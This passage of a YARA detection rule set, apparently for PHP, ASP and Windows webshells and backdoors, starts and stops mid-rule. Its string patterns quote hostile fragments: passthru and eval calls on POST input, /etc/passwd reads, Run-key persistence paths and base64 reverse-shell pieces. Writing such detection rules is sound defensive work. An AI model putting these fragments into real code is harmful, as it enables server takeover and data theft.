);" fullword $s5 = "print \"<center>[ Generation time: \".round(getTime()-startTime,4).\" second" $s9 = "if (mkdir($_POST['dir'], 0777) == false) {" fullword $s12 = "$ret = shellexec($command);" fullword condition: 2 of them } rule WebShell_CasuS_1_5 { meta: description = "PHP Webshells Github Archive - file CasuS 1.5.php" author = "Florian Roth" hash = "7eee8882ad9b940407acc0146db018c302696341" strings: $s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO" $s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword $s18 = "if (file_exists(\"F:\\\\\")){" fullword condition: 1 of them } rule WebShell_ftpsearch { meta: description = "PHP Webshells Github Archive - file ftpsearch.php" author = "Florian Roth" hash = "c945f597552ccb8c0309ad6d2831c8cabdf4e2d6" strings: $s0 = "echo \"[-] Error : coudn't read /etc/passwd\";" fullword $s9 = "@$ftp=ftp_connect('');" fullword $s12 = "echo \"<title>Edited By KingDefacer</title><body>\";" fullword $s19 = "echo \"[+] Founded \".sizeof($users).\" entrys in /etc/passwd\\n\";" fullword condition: 2 of them } rule WebShell__Cyber_Shell_cybershell_Cyber_Shell__v_1_0_ { meta: description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php" author = "Florian Roth" super_rule = 1 hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38" hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f" hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076" strings: $s4 = " <a href=\"http://www.cyberlords.net\" target=\"_blank\">Cyber Lords Community</" $s10 = "echo \"<meta http-equiv=Refresh content=\\\"0; url=$PHP_SELF?edit=$nameoffile&sh" $s11 = " * Coded by Pixcher" fullword $s16 = "<input type=text size=55 name=newfile value=\"$d/newfile.php\">" fullword condition: 2 of them } rule WebShell__Ajax_PHP_Command_Shell_Ajax_PHP_Command_Shell_soldierofallah { meta: description = "PHP Webshells Github Archive - from files Ajax_PHP Command Shell.php, Ajax_PHP_Command_Shell.php, soldierofallah.php" author = "Florian Roth" super_rule = 1 hash0 = "fa11deaee821ca3de7ad1caafa2a585ee1bc8d82" hash1 = "c0a4ba3e834fb63e0a220a43caaf55c654f97429" hash2 = "16fa789b20409c1f2ffec74484a30d0491904064" strings: $s1 = "'Read /etc/passwd' => \"runcommand('etcpasswdfile','GET')\"," fullword $s2 = "'Running processes' => \"runcommand('ps -aux','GET')\"," fullword $s3 = "$dt = $_POST['filecontent'];" fullword $s4 = "'Open ports' => \"runcommand('netstat -an | grep -i listen','GET')\"," fullword $s6 = "print \"Sorry, none of the command functions works.\";" fullword $s11 = "document.cmdform.command.value='';" fullword $s12 = "elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST" condition: 3 of them } rule WebShell_Generic_PHP_7 { meta: description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php" author = "Florian Roth" super_rule = 1 hash0 = "de98f890790756f226f597489844eb3e53a867a9" hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e" hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267" hash3 = "715f17e286416724e90113feab914c707a26d456" strings: $s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword $s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword $s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword $s4 = "if( $action == \"dumpTable\" )" fullword condition: 2 of them } rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall { meta: description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php" author = "Florian Roth" super_rule = 1 hash0 = "b148ead15d34a55771894424ace2a92983351dda" hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b" hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856" hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c" strings: $s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword $s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword $s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword $s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword condition: 2 of them } rule WebShell_Generic_PHP_8 { meta: description = "PHP Webshells Github Archive - from files Macker's Private PHPShell.php, PHP Shell.php, Safe0ver Shell -Safe Mod Bypass By Evilc0der.php" author = "Florian Roth" super_rule = 1 hash0 = "fc1ae242b926d70e32cdb08bbe92628bc5bd7f99" hash1 = "9ad55629c4576e5a31dd845012d13a08f1c1f14e" hash2 = "c4aa2cf665c784553740c3702c3bfcb5d7af65a3" strings: $s1 = "elseif ( $cmd==\"file\" ) { /* <!-- View a file in text --> */" fullword $s2 = "elseif ( $cmd==\"upload\" ) { /* <!-- Upload File form --> */ " fullword $s3 = "/* I added this to ensure the script will run correctly..." fullword $s14 = "<!-- </form> -->" fullword $s15 = "<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\">" fullword $s20 = "elseif ( $cmd==\"downl\" ) { /*<!-- Save the edited file back to a file --> */" fullword condition: 3 of them } rule WebShell__PH_Vayv_PHVayv_PH_Vayv_klasvayv_asp_php { meta: description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php, klasvayv.asp.php.txt" author = "Florian Roth" super_rule = 1 hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee" hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357" hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653" hash3 = "4f83bc2836601225a115b5ad54496428a507a361" strings: $s1 = "<font color=\"#000000\">Sil</font></a></font></td>" fullword $s5 = "<td width=\"122\" height=\"17\" bgcolor=\"#9F9F9F\">" fullword $s6 = "onfocus=\"if (this.value == 'Kullan" fullword $s16 = "<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">" condition: 2 of them } rule WebShell_Generic_PHP_9 { meta: description = "PHP Webshells Github Archive - from files KAdot Universal Shell v0.1.6.php, KAdot_Universal_Shell_v0.1.6.php, KA_uShell 0.1.6.php" author = "Florian Roth" super_rule = 1 hash0 = "89f2a7007a2cd411e0a7abd2ff5218d212b84d18" hash1 = "2266178ad4eb72c2386c0a4d536e5d82bb7ed6a2" hash2 = "0daed818cac548324ad0c5905476deef9523ad73" strings: $s2 = ":<b>\" .base64_decode($_POST['tot']). \"</b>\";" fullword $s6 = "if (isset($_POST['wq']) && $_POST['wq']<>\"\") {" fullword $s12 = "if (!empty($_POST['c'])){" fullword $s13 = "passthru($_POST['c']);" fullword $s16 = "<input type=\"radio\" name=\"tac\" value=\"1\">B64 Decode<br>" fullword $s20 = "<input type=\"radio\" name=\"tac\" value=\"3\">md5 Hash" fullword condition: 3 of them } rule WebShell__PH_Vayv_PHVayv_PH_Vayv { meta: description = "PHP Webshells Github Archive - from files PH Vayv.php, PHVayv.php, PH_Vayv.php" author = "Florian Roth" super_rule = 1 hash0 = "b51962a1ffa460ec793317571fc2f46042fd13ee" hash1 = "408ac9ca3d435c0f78bda370b33e84ba25afc357" hash2 = "4003ae289e3ae036755976f8d2407c9381ff5653" strings: $s4 = "<form method=\"POST\" action=\"<?echo \"PHVayv.php?duzkaydet=$dizin/$duzenle" $s12 = "<? if ($ekinci==\".\" or $ekinci==\"..\") {" fullword $s17 = "name=\"duzenx2\" value=\"Klas" fullword condition: 2 of them } rule WebShell_Generic_PHP_1 { meta: description = "PHP Webshells Github Archive - from files Dive Shell 1.0 - Emperor Hacking Team.php, Dive_Shell_1.0_Emperor_Hacking_Team.php, SimShell 1.0 - Simorgh Security MGZ.php, SimShell_1.0_-_Simorgh_Security_MGZ.php" author = "Florian Roth" super_rule = 1 hash0 = "3b086b9b53cf9d25ff0d30b1d41bb2f45c7cda2b" hash1 = "2558e728184b8efcdb57cfab918d95b06d45de04" hash2 = "203a8021192531d454efbc98a3bbb8cabe09c85c" hash3 = "b79709eb7801a28d02919c41cc75ac695884db27" strings: $s1 = "$token = substr($_REQUEST['command'], 0, $length);" fullword $s4 = "var command_hist = new Array(<?php echo $js_command_hist ?>);" fullword $s7 = "$_SESSION['output'] .= htmlspecialchars(fgets($io[1])," fullword $s9 = "document.shell.command.value = command_hist[current_line];" fullword $s16 = "$_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $" $s19 = "if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {" fullword $s20 = "if (e.keyCode == 38 && current_line < command_hist.length-1) {" fullword condition: 5 of them } rule WebShell_Generic_PHP_2 { meta: description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php" author = "Florian Roth" super_rule = 1 hash0 = "335a0851304acedc3f117782b61479bbc0fd655a" hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241" hash2 = "36d8782d749638fdcaeed540d183dd3c8edc6791" hash3 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de" strings: $s3 = "if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))" fullword $s4 = "\\$port = {$_POST['port']};" fullword $s5 = "$_POST['installpath'] = \"temp.pl\";}" fullword $s14 = "if(isset($_POST['post']) and $_POST['post'] == \"yes\" and @$HTTP_POST_FILES[\"u" $s16 = "copy($HTTP_POST_FILES[\"userfile\"][\"tmp_name\"],$HTTP_POST_FILES[\"userfile\"]" condition: 4 of them } rule WebShell__CrystalShell_v_1_erne_stres { meta: description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, erne.php, stres.php" author = "Florian Roth" super_rule = 1 hash0 = "335a0851304acedc3f117782b61479bbc0fd655a" hash1 = "6eb4ab630bd25bec577b39fb8a657350bf425687" hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de" strings: $s1 = "<input type='submit' value=' open (shill.txt) '>" fullword $s4 = "var_dump(curl_exec($ch));" fullword $s7 = "if(empty($_POST['Mohajer22'])){" fullword $s10 = "$m=$_POST['curl'];" fullword $s13 = "$u1p=$_POST['copy'];" fullword $s14 = "if(empty(\\$_POST['cmd'])){" fullword $s15 = "$string = explode(\"|\",$string);" fullword $s16 = "$stream = imap_open(\"/etc/passwd\", \"\", \"\");" fullword condition: 5 of them } rule WebShell_Generic_PHP_3 { meta: description = "PHP Webshells Github Archive - from files Antichat Shell v1.3.php, Antichat Shell. Modified by Go0o$E.php, Antichat Shell.php, fatal.php" author = "Florian Roth" super_rule = 1 hash0 = "d829e87b3ce34460088c7775a60bded64e530cd4" hash1 = "d710c95d9f18ec7c76d9349a28dd59c3605c02be" hash2 = "f044d44e559af22a1a7f9db72de1206f392b8976" hash3 = "41780a3e8c0dc3cbcaa7b4d3c066ae09fb74a289" strings: $s0 = "header('Content-Length:'.filesize($file).'');" fullword $s4 = "<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_POST['comma" $s7 = "if(filetype($dir . $file)==\"file\")$files[]=$file;" fullword $s14 = "elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} " fullword $s20 = "$info .= (($perms & 0x0004) ? 'r' : '-');" fullword condition: all of them } rule WebShell_Generic_PHP_4 { meta: description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, load_shell.php, nshell.php, Loaderz WEB Shell.php, stres.php" author = "Florian Roth" super_rule = 1 hash0 = "335a0851304acedc3f117782b61479bbc0fd655a" hash1 = "ca9fcfb50645dc0712abdf18d613ed2196e66241" hash2 = "86bc40772de71b1e7234d23cab355e1ff80c474d" hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791" hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de" strings: $s0 = "if ($filename != \".\" and $filename != \"..\"){" fullword $s2 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';" fullword $s5 = "$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';" fullword $s6 = "$world[\"write\"] = ($mode & 00002) ? 'w' : '-';" fullword $s7 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';" fullword $s10 = "foreach ($arr as $filename) {" fullword $s19 = "else if( $mode & 0x6000 ) { $type='b'; }" fullword condition: all of them } rule WebShell_Generic_PHP_5 { meta: description = "PHP Webshells Github Archive - from files ex0shell.php, megabor.php, GRP WebShell 2.0 release build 2018 (C)2006,Great.php" author = "Florian Roth" super_rule = 1 hash0 = "64461ad8d8f23ea078201a31d747157f701a4e00" hash1 = "3df1afbcfa718da6fc8af27554834ff6d1a86562" hash2 = "ad86ef7f24f75081318146edc788e5466722a629" strings: $s0 = "(($perms & 0x0400) ? 'S' : '-'));" fullword $s10 = "} elseif (($perms & 0x8000) == 0x8000) {" fullword $s11 = "if (($perms & 0xC000) == 0xC000) {" fullword $s12 = "$info .= (($perms & 0x0008) ?" fullword $s16 = "// Block special" fullword $s18 = "$info = 's';" fullword condition: all of them } rule WebShell_GFS { meta: description = "PHP Webshells Github Archive - from files GFS web-shell ver 3.1.7 - PRiV8.php, Predator.php, GFS_web-shell_ver_3.1.7_-_PRiV8.php" author = "Florian Roth" super_rule = 1 hash0 = "c2f1ef6b11aaec255d4dd31efad18a3869a2a42c" hash1 = "34f6640985b07009dbd06cd70983451aa4fe9822" hash2 = "d25ef72bdae3b3cb0fc0fdd81cfa58b215812a50" strings: $s0 = "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==\";" fullword $s1 = "lIENPTk47DQpleGl0IDA7DQp9DQp9\";" fullword $s2 = "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShm" condition: all of them } rule WebShell__CrystalShell_v_1_sosyete_stres { meta: description = "PHP Webshells Github Archive - from files CrystalShell v.1.php, sosyete.php, stres.php" author = "Florian Roth" super_rule = 1 hash0 = "335a0851304acedc3f117782b61479bbc0fd655a" hash1 = "e32405e776e87e45735c187c577d3a4f98a64059" hash2 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de" strings: $s1 = "A:visited { COLOR:blue; TEXT-DECORATION: none}" fullword $s4 = "A:active {COLOR:blue; TEXT-DECORATION: none}" fullword $s11 = "scrollbar-darkshadow-color: #101842;" fullword $s15 = "<a bookmark=\"minipanel\">" fullword $s16 = "background-color: #EBEAEA;" fullword $s18 = "color: #D5ECF9;" fullword $s19 = "<center><TABLE style=\"BORDER-COLLAPSE: collapse\" height=1 cellSpacing=0 border" condition: all of them } rule WebShell_Generic_PHP_10 { meta: description = "PHP Webshells Github Archive - from files Cyber Shell.php, cybershell.php, Cyber Shell (v 1.0).php, PHPRemoteView.php" author = "Florian Roth" super_rule = 1 hash0 = "ef7f7c45d26614cea597f2f8e64a85d54630fe38" hash1 = "cabf47b96e3b2c46248f075bdbc46197db28a25f" hash2 = "9e165d4ed95e0501cd9a90155ac60546eb5b1076" hash3 = "7d5b54c7cab6b82fb7d131d7bbb989fd53cb1b57" strings: $s2 = "$world[\"execute\"] = ($world['execute']=='x') ? 't' : 'T'; " fullword $s6 = "$owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; " fullword $s11 = "$world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; " fullword $s12 = "else if( $mode & 0xA000 ) " fullword $s17 = "$s=sprintf(\"%1s\", $type); " fullword $s20 = "font-size: 8pt;" fullword condition: all of them } rule WebShell_Generic_PHP_11 { meta: description = "PHP Webshells Github Archive - from files rootshell.php, Rootshell.v.1.0.php, s72 Shell v1.1 Coding.php, s72_Shell_v1.1_Coding.php" author = "Florian Roth" super_rule = 1 hash0 = "31a82cbee8dffaf8eb7b73841f3f3e8e9b3e78cf" hash1 = "838c7191cb10d5bb0fc7460b4ad0c18c326764c6" hash2 = "8dfcd919d8ddc89335307a7b2d5d467b1fd67351" hash3 = "80aba3348434c66ac471daab949871ab16c50042" strings: $s5 = "$filename = $backupstring.\"$filename\";" fullword $s6 = "while ($file = readdir($folder)) {" fullword $s7 = "if($file != \".\" && $file != \"..\")" fullword $s9 = "$backupstring = \"copy_of_\";" fullword $s10 = "if( file_exists($file_name))" fullword $s13 = "global $file_name, $filename;" fullword $s16 = "copy($file,\"$filename\");" fullword $s18 = "<td width=\"49%\" height=\"142\">" fullword condition: all of them } rule WebShell__findsock_php_findsock_shell_php_reverse_shell { meta: description = "PHP Webshells Github Archive - from files findsock.c, php-findsock-shell.php, php-reverse-shell.php" author = "Florian Roth" super_rule = 1 hash0 = "5622c9841d76617bfc3cd4cab1932d8349b7044f" hash1 = "4a20f36035bbae8e342aab0418134e750b881d05" hash2 = "40dbdc0bdf5218af50741ba011c5286a723fa9bf" strings: $s1 = "// me at pentestmonkey@pentestmonkey.net" fullword condition: all of them } rule WebShell_Generic_PHP_6 { meta: description = "PHP Webshells Github Archive - from files c0derz shell [csh] v. 0.1.1 release.php, CrystalShell v.1.php, load_shell.php, Loaderz WEB Shell.php, stres.php" author = "Florian Roth" super_rule = 1 hash0 = "1a08f5260c4a2614636dfc108091927799776b13" hash1 = "335a0851304acedc3f117782b61479bbc0fd655a" hash2 = "ca9fcfb50645dc0712abdf18d613ed2196e66241" hash3 = "36d8782d749638fdcaeed540d183dd3c8edc6791" hash4 = "03f88f494654f2ad0361fb63e805b6bbfc0c86de" strings: $s2 = "@eval(stripslashes($_POST['phpcode']));" fullword $s5 = "echo shell_exec($com);" fullword $s7 = "if($sertype == \"winda\"){" fullword $s8 = "function execute($com)" fullword $s12 = "echo decode(execute($cmd));" fullword $s15 = "echo system($com);" fullword condition: 4 of them } rule Unpack_Injectt { meta: description = "Webshells Auto-generated - file Injectt.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8a5d2158a566c87edc999771e12d42c5" strings: $s2 = "%s -Run -->To Install And Run The Service" $s3 = "%s -Uninstall -->To Uninstall The Service" $s4 = "(STANDARD_RIGHTS_REQUIRED |SC_MANAGER_CONNECT |SC_MANAGER_CREATE_SERVICE |SC_MAN" condition: all of them } rule HYTop_DevPack_fso { meta: description = "Webshells Auto-generated - file fso.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b37f3cde1a08890bd822a182c3a881f6" strings: $s0 = "<!-- PageFSO Below -->" $s1 = "theFile.writeLine(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli" condition: all of them } rule FeliksPack3___PHP_Shells_ssh { meta: description = "Webshells Auto-generated - file ssh.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1aa5307790d72941589079989b4f900e" strings: $s0 = "eval(gzinflate(str_rot13(base64_decode('" condition: all of them } rule Debug_BDoor { meta: description = "Webshells Auto-generated - file BDoor.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "e4e8e31dd44beb9320922c5f49739955" strings: $s1 = "\\BDoor\\" $s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" condition: all of them } rule bin_Client { meta: description = "Webshells Auto-generated - file Client.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5f91a5b46d155cacf0cc6673a2a5461b" strings: $s0 = "Recieved respond from server!!" $s4 = "packet door client" $s5 = "input source port(whatever you want):" $s7 = "Packet sent,waiting for reply..." condition: all of them } rule ZXshell2_0_rar_Folder_ZXshell { meta: description = "Webshells Auto-generated - file ZXshell.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "246ce44502d2f6002d720d350e26c288" strings: $s0 = "WPreviewPagesn" $s1 = "DA!OLUTELY N" condition: all of them } rule RkNTLoad { meta: description = "Webshells Auto-generated - file RkNTLoad.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "262317c95ced56224f136ba532b8b34f" strings: $s1 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $" $s2 = "5pur+virtu!" $s3 = "ugh spac#n" $s4 = "xcEx3WriL4" $s5 = "runtime error" $s6 = "loseHWait.Sr." $s7 = "essageBoxAw" $s8 = "$Id: UPX 1.07 Copyright (C) 1996-2001 the UPX Team. All Rights Reserved. $" condition: all of them } rule binder2_binder2 { meta: description = "Webshells Auto-generated - file binder2.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d594e90ad23ae0bc0b65b59189c12f11" strings: $s0 = "IsCharAlphaNumericA" $s2 = "WideCharToM" $s4 = "g 5pur+virtu!" $s5 = "\\syslog.en" $s6 = "heap7'7oqk?not=" $s8 = "- Kablto in" condition: all of them } rule thelast_orice2 { meta: description = "Webshells Auto-generated - file orice2.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "aa63ffb27bde8d03d00dda04421237ae" strings: $s0 = " $aa = $_GET['aa'];" $s1 = "echo $aa;" condition: all of them } rule FSO_s_sincap { meta: description = "Webshells Auto-generated - file sincap.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "dc5c2c2392b84a1529abd92e98e9aa5b" strings: $s0 = " <font color=\"#E5E5E5\" style=\"font-size: 8pt; font-weight: 700\" face=\"Arial\">" $s4 = "<body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=" condition: all of them } rule PhpShell { meta: description = "Webshells Auto-generated - file PhpShell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "539baa0d39a9cf3c64d65ee7a8738620" strings: $s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>." condition: all of them } rule HYTop_DevPack_config { meta: description = "Webshells Auto-generated - file config.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b41d0e64e64a685178a3155195921d61" strings: $s0 = "const adminPassword=\"" $s2 = "const userPassword=\"" $s3 = "const mVersion=" condition: all of them } rule sendmail { meta: description = "Webshells Auto-generated - file sendmail.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "75b86f4a21d8adefaf34b3a94629bd17" strings: $s3 = "_NextPyC808" $s6 = "Copyright (C) 2000, Diamond Computer Systems Pty. Ltd. (www.diamondcs.com.au)" condition: all of them } rule FSO_s_zehir4 { meta: description = "Webshells Auto-generated - file zehir4.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "5b496a61363d304532bcf52ee21f5d55" strings: $s5 = " byMesaj " condition: all of them } rule hkshell_hkshell { meta: description = "Webshells Auto-generated - file hkshell.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "168cab58cee59dc4706b3be988312580" strings: $s1 = "PrSessKERNELU" $s2 = "Cur3ntV7sion" $s3 = "Explorer8" condition: all of them } rule iMHaPFtp { meta: description = "Webshells Auto-generated - file iMHaPFtp.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "12911b73bc6a5d313b494102abcf5c57" strings: $s1 = "echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">" condition: all of them } rule Unpack_TBack { meta: description = "Webshells Auto-generated - file TBack.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "a9d1007823bf96fb163ab38726b48464" strings: $s5 = "\\final\\new\\lcc\\public.dll" condition: all of them } rule DarkSpy105 { meta: description = "Webshells Auto-generated - file DarkSpy105.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "f0b85e7bec90dba829a3ede1ab7d8722" strings: $s7 = "Sorry,DarkSpy got an unknown exception,please re-run it,thanks!" condition: all of them } rule EditServer_3 { meta: description = "Webshells Auto-generated - file EditServer.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "f945de25e0eba3bdaf1455b3a62b9832" strings: $s2 = "Server %s Have Been Configured" $s5 = "The Server Password Exceeds 32 Characters" $s8 = "9--Set Procecess Name To Inject DLL" condition: all of them } rule FSO_s_reader { meta: description = "Webshells Auto-generated - file reader.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b598c8b662f2a1f6cc61f291fb0a6fa2" strings: $s2 = "mailto:mailbomb@hotmail." condition: all of them } rule ASP_CmdAsp { meta: description = "Webshells Auto-generated - file CmdAsp.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "79d4f3425f7a89befb0ef3bafe5e332f" strings: $s2 = "' -- Read the output from our command and remove the temp file -- '" $s6 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" $s9 = "' -- create the COM objects that we will be using -- '" condition: all of them } rule KA_uShell { meta: description = "Webshells Auto-generated - file KA_uShell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "685f5d4f7f6751eaefc2695071569aab" strings: $s5 = "if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass" $s6 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" condition: all of them } rule PHP_Backdoor_v1 { meta: description = "Webshells Auto-generated - file PHP Backdoor v1.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "0506ba90759d11d78befd21cabf41f3d" strings: $s5 = "echo\"<form method=\\\"POST\\\" action=\\\"\".$_SERVER['PHP_SELF'].\"?edit=\".$th" $s8 = "echo \"<a href=\\\"\".$_SERVER['PHP_SELF'].\"?proxy" condition: all of them } rule svchostdll { meta: description = "Webshells Auto-generated - file svchostdll.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "0f6756c8cb0b454c452055f189e4c3f4" strings: $s0 = "InstallService" $s1 = "RundllInstallA" $s2 = "UninstallService" $s3 = "&G3 Users In RegistryD" $s4 = "OL_SHUTDOWN;I" $s5 = "SvcHostDLL.dll" $s6 = "RundllUninstallA" $s7 = "InternetOpenA" $s8 = "Check Cloneomplete" condition: all of them } rule HYTop_DevPack_server { meta: description = "Webshells Auto-generated - file server.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "1d38526a215df13c7373da4635541b43" strings: $s0 = "<!-- PageServer Below -->" condition: all of them } rule vanquish { meta: description = "Webshells Auto-generated - file vanquish.dll" author = "Yara Bulk Rule Generator by Florian Roth" hash = "684450adde37a93e8bb362994efc898c" strings: $s3 = "You cannot delete protected files/folders! Instead, your attempt has been logged" $s8 = "?VCreateProcessA@@YGHPBDPADPAU_SECURITY_ATTRIBUTES@@2HKPAX0PAU_STARTUPINFOA@@PAU" $s9 = "?VFindFirstFileExW@@YGPAXPBGW4_FINDEX_INFO_LEVELS@@PAXW4_FINDEX_SEARCH_OPS@@2K@Z" condition: all of them } rule winshell { meta: description = "Webshells Auto-generated - file winshell.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "3144410a37dd4c29d004a814a294ea26" strings: $s0 = "Software\\Microsoft\\Windows\\CurrentVersion\\RunServices" $s1 = "WinShell Service" $s2 = "__GLOBAL_HEAP_SELECTED" $s3 = "__MSVCRT_HEAP_SELECT" $s4 = "Provide Windows CmdShell Service" $s5 = "URLDownloadToFileA" $s6 = "RegisterServiceProcess" $s7 = "GetModuleBaseNameA" $s8 = "WinShell v5.0 (C)2002 janker.org" condition: all of them } rule FSO_s_remview { meta: description = "Webshells Auto-generated - file remview.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "b4a09911a5b23e00b55abe546ded691c" strings: $s2 = " echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\"" $s3 = " echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\"" $s4 = " echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<" condition: all of them } rule saphpshell { meta: description = "Webshells Auto-generated - file saphpshell.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d7bba8def713512ddda14baf9cd6889a" strings: $s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>" condition: all of them } rule HYTop2006_rar_Folder_2006Z { meta: description = "Webshells Auto-generated - file 2006Z.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "fd1b6129abd4ab177fed135e3b665488" strings: $s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth" $s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" condition: all of them } rule admin_ad { meta: description = "Webshells Auto-generated - file admin-ad.asp" author = "Yara Bulk Rule Generator by Florian Roth" hash = "e6819b8f8ff2f1073f7d46a0b192f43b" strings: $s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz" $s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><" condition: all of them } rule FSO_s_casus15 { meta: description = "Webshells Auto-generated - file casus15.php" author = "Yara Bulk Rule Generator by Florian Roth" hash = "8d155b4239d922367af5d0a1b89533a3" strings: $s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))" condition: all of them } rule BIN_Client { meta: description = "Webshells Auto-generated - file Client.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "9f0a74ec81bc2f26f16c5c172b80eca7" strings: $s0 = "=====Remote Shell Closed=====" $s2 = "All Files(*.*)|*.*||" $s6 = "WSAStartup Error!" $s7 = "SHGetFileInfoA" $s8 = "CreateThread False!" $s9 = "Port Number Error" condition: 4 of them } rule shelltools_g0t_root_uptime { meta: description = "Webshells Auto-generated - file uptime.exe" author = "Yara Bulk Rule Generator by Florian Roth" hash = "d1f56102bc5d3e2e37ab3ffa392073b9" strings: $s0 = "JDiamondCSlC~" $s1 = "CharactQA" $s2 = "$Info: This file is packed with the UPX executable packer $" $s5 = "HandlereateConso" $s7 = 